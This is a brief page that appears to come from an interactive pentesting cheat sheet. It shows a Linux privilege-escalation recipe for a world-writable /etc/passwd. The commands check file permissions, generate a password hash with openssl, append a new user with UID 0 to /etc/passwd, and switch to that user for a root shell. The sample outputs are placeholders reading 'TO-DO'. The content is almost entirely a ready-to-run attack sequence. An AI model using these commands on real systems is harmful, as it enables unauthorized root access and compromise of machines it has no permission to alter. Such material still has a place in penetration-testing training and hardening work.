Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1: Writable /etc/passwd
# Check
ls -l /etc/passwd /etc/shadow
Sample Output:
TO-DO# Create password hash
openssl passwd -1 password
Sample Output:
TO-DO# Add to /etc/passwd
echo 'user:$1$mQ8Xk.u8$XjFlyg01xLRjhCK/v//Qe/:0:0:comment:/root:/bin/bash' >> /etc/passwd
Sample Output:
TO-DO# Get root shell
su - user
Sample Output:
TO-DO